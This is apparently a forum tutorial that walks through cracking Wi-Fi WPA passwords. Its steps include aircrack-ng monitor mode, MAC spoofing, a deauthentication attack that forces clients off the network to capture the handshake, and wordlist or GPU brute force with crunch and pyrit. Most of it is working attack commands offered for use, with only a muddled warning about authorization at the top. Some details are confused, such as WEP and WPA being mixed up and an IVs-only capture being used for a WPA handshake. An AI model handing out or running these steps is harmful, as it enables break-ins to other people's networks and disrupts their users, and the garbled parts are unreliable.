WARNING :Don't Hack any authorized
router,otherwise you'll be put into jail.
certain things to be followed..such as creating virtual
machine!!!running in your OS if you have windows..!!
- At BOOT Menu....just type startx
- an Now your all set to go...just simply follow below
steps...now
Rules to Follow
- A Backtrack Live CD:
the Linux Live CD that lets you do all sorts of security testing and
tasks. Download yourself a copy of the CD and burn it, or load it up in
VMware to get started.
- here a link to download it http://www.backtrack-linux.org/downloads
- I highly recommend you to download backtrck 32 bit
version coz it runs smoothly...in win7 64bit through vmware
workstation.......... /
- A nearby WEP-enabled Wi-Fi network
- Patience with the command
line. This is an ten-step process
that requires typing in long, arcane commands and waiting around for your
Wi-Fi card to collect data in order to crack the password. Like the
doctor said to the short person, be a little patient.
Steps to Follow:
Step
1 :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel
5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs
mon0
*where -c is the channel
-w is the file to
be written
--bssid is the
BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44
mon0
*where -a is the BSSID
-c is the client
MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst
wpacrack-01.ivs
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv |
aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where 8 16 is the length of the password, i.e.
from 8 characters to 16 characters.
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password
with crunch.
Step a :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel
5100 iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44
mon0
*where -a is the BSSID
-c is the client
MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev
libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the
current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list
Download pyrit and cpyrit-cuda (the
current version is 0.4.0 at the time of this writing).
tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit
--all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i -
attack_passthrough
*where 8 16 is the length of the password, i.e.
from 8 characters to 16 characters.
Step k (Optional) :
If you encounter error when reading the wpacrack-01.cap, you
should do the following step.
pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit
--all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e.
from 8 characters to 16 characters.
Step l :
Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is
about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not
:
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make
sure pyrit workable on your system :
pyrit list_cores
